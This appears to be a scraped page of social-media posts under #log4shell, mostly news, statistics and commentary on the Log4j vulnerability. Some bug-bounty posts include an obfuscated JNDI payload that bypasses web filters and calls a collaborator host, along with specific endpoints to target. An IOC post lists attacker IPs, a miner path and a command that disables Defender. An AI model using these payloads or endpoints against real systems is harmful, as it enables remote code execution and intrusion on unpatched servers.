#log4shell search results

. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow


The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still use vulnerable #Log4J in their apps. So don't leave a single endpoint unchecked, scan everything. #BugBounty


“so, how’s #log4shell patching going?”


In Dec 2021, the Log4Shell (CVE-2021-44228) vulnerability in Apache's Log4j shook the tech world, found by Alibaba Cloud's security team. Its ability to let attackers execute arbitrary code underscored the importance of up-to-date software. #Log4Shell


⬇️ Cybersecurity in cloud environments ⬇️ - Log management. - Monitoring. - Attention to new vulnerabilities such as #Log4Shell: patching! - Privilege management. 💡Find out more in the post on the @OVHcloud_ES blog: ovh.to/RLzqJFp #ciberseguridad #cloud #patrocinado


It's 2024, and a worrying trend is appearing on the Log4shell dashboard. In December, 25% of downloads of L4J were vulnerable to #log4shell - that number sits at 36% today and has been for a few weeks. We're going backwards.


Watch this video with @TonyatESET and learn not just about the latest trends in #ransomware, but also about new statistics concerning #phishing and why the #Log4Shell vulnerability remains a problem. --------------- #WeLiveSecurity #ESET #WeekinSecurity


UH OH SPICY GOT OFF HIS LAZY ASS AND FINALLY STARTED EDITING! Little sneak peek of the project I have going for YouTube, let me know what you think #infosec #cybersecurity #log4shell #Java #YouTube


Three years after #Log4Shell caused a significant security issue, we still struggle with insecure dependencies and injection problems, join @BrianVerm @vilojona @costlow @FrankDelporte for a lively #Java #OpenJDK and beyond discussion on Foojay! foojay.io/today/foojay-p…


Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security


🕵️‍♂️Researchers have observed #Lazarus exploiting the #Log4Shell #RCE #vulnerability (CVE-2021-44228) in #OperationBlacksmith campaign, deploying new #DLang #malware: #NineRAT, #DLRAT, and #BottomLoader. 💡Explore more on SOCRadar’s #APT Profile: socradar.io/apt-profile-wh…


An interesting (yet short) attack path that exploited #log4shell in @VMware #vRealize and harvested an #AWS Access Key to access an @elastic #logstash instance in AWS. This was buried among 1700 hosts, executed by NodeZero with no humans involved @Horizon3ai #Pentesting #infosec


The persistent threat -- why major vulnerabilities like #Log4Shell and #Spring4Shell remain significant and super dangerous, by @brianverm @snyksec, #Java and beyond: foojay.io/today/the-pers… #foojaytip


I used this docker image with Minecraft #Log4shell demonstration during my lectures about #cyberattacks at #gamefair2023 conference. Moreover, for victim machine, I used @ReactOS with #Java and #Minecraft server, it worked fine for proof of concept attack with calc execution.


Two years ago #Log4j (CVE-2021-44228) #vulnerability was present in many products, incl. #Minecraft. Recently, I prepared the #Docker image with vulnerable Minecraft server for demonstration of #Log4shell #exploit during my lectures malwarelab.eu/posts/log4shel… #Education #Java



I have a #Log4Shell payload on my GitHub Profile using a @ThinkstCanary Canary Token. Every once in a while I open my email and get a good chuckle 😂


Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈


Tomorrow we'll take Indiana's I-80/90 toll route toward Chicago, displaying both the #EICAR #antivirus test string and the #Log4Shell PoC QR code magnets on the vehicle. Watch out, future DFIR aficionados!



Now available for ACM Members: "SecOps Tools and 2021 Security Incidents: Log4Shell Exploit," w/Joseph Khoury. Upon completion of this course, you'll be able to describe the tools used to detect and conduct a #Log4Shell exploit. bit.ly/3KcYhoR


#Log4Shell & #Spring4Shell proved that we need to keep our dependencies up-to-date. From package managers to bots that can create changes on repositories, there are many tools. At #GOTOcph @MaritvanDijk77 will talk about keeping your dependencies in check gotocph.com/2023


Two years after security researchers discovered the #Log4Shell vulnerability, roughly 38% of applications still use a vulnerable version of the Apache #Log4j library. veracode.com/blog/research/…



#Log4j could have failed many times. But it survived. Not because of money, but because of people. An honest look behind the scenes — from the first line of code to the project’s greatest crisis. Read Christian Grobmeier’s new piece: javapro.io/2025/06/10/the… #Log4Shell @TheASF


Armis reveals 2025’s top supply chain threats: AI-driven slopsquatting attacks, security flaws in AI-generated code, and major software supply chain breaches reshape the global cybersecurity landscape. #Slopsquatting #Log4Shell #VibeCoding ift.tt/NevoE8t


Prevent The Next #Log4Shell-A Call To Action "Open Source Economy is a new nonprofit organization formed by maintainers of several critical Java libraries to build a safer, stronger #Java ecosystem" On IProgrammer➡️ cutt.ly/xrVlMgpp @OS_Economy #jvm #opensdk #oss


Log4Shell was supposed to be a turning point. But nearly 4 years later, funding dropped, gov’t focus shifted, & developers were pulled into AI. New blog: How AI & politics stalled open-source security → bit.ly/3V5oyK5 #CyberSecurity #OpenSource #Log4Shell


"What if we had been on vacation?" #Log4Shell hit millions of systems in 2021; a few volunteers saved the net. Christian Grobmeier's look back at 30 years of #Log4j shows what #OpenSource can achieve & its limits when companies only consume! javapro.io/de/die-lange-g…


Millions lost. Servers hijacked. All because of overlooked code patterns, you might still have today. @vilojona reveals the unseen traps. Are you truly protected against SQLi, #Log4Shell & deserialization hacks? Decode it here: javapro.io/2025/04/29/top… #DevSecOps #SQLInjection


Your perspective is essential to securing the future of the Java ecosystem. 📢 Anonymized results will be shared publicly. 📌 Follow Open Source Economy to stay in the loop. #Java #OpenSource #Log4Shell #Cybersecurity #FOSS #Sustainability #OpenSSF


CVE-2021-44228: impact and solutions for the log4j vulnerability trendingtech.news/trending-news/… #CVE-2021-44228 #Log4Shell #Apache Log4j 2 #softwarebeveiliging #kwetsbaarheid patchen #Trending #Tech #Nieuws



I fell in love with #Log4Shell again; 4 P1s in a row. It's a simple recon and understanding where to spray the payload. This tweet is for you haters who made fun of my recent Log4Shell post. #BugBounty


Another Tip: I found this VMWare vCenter #Log4Shell vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method is actually of CVE-2021-22005; however, this ep is vulnerable to Log4Shell as well. #BugBounty --> Bounty $2100.00.



"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability. #BugBounty


🔺 Mass exploitation of VMWare Horizon via #Log4Shell (CVE-2021-44228) to install a miner. Attacker IP: 139.99.241.160 🇦🇺 LDAP: 135.125.146.221:1389 Miner: /150.129.234.203:82/add.bat "Set-MpPreference -DisableRealtimeMonitoring $true" IOCs: github.com/CronUp/Malware…


Finally got my 5 months old #Log4Shell report triaged after a couple of "Need more infos" and "Not applicable", super excited🤪🤪😍😍. #BugBounty


They are pretty cozy! 😄 #log4shell #anniversary


Had some questions about how we got the Log4Shell sweaters that @sethlaw and I wore during yesterday’s @absoluteappsec podcast so: DM @rreichel3 as he is gauging interest for a second run of them.



Today marks the 3-year anniversary of the #Log4Shell PoC going public 🧑‍🎄 I still remember going to sleep on the 9th with a PoC I couldn’t reproduce, only to wake up the next morning to all hell breaking loose and hundreds of RCEs everywhere. Would love to hear your stories! 💸


I found multiple instances of #Tableau CSP in the endpoint "/vizql/csp-report/" are vulnerable to #Log4Shell (CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test: pastebin.com/es3Aidfr #BugBounty


There have been over 840K attacks on companies globally, all exploiting the #Log4j (aka #Log4Shell) vulnerability. Learn more about this vulnerability: blck.by/34mUiTQ


After almost a year + multiple fixes and patches, #Log4Shell vulnerabilities are still being found, I recently found two on a single BB program. Waiting for Program owner's response after triage. So keep looking for #Log4Shell in the sub+domains. #BugBounty #bugbountytips


We identified severe security issues within AWS #Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. bit.ly/3EqPbjd


The exploitation of #Log4Shell hasn’t shown any signs of slowing down as the SonicWall threat research team recorded 557.5 million #exploit attempts from December to June. Get the details in the mid-year update to the 2022 SonicWall Cyber Threat Report. bit.ly/3BsPFnO

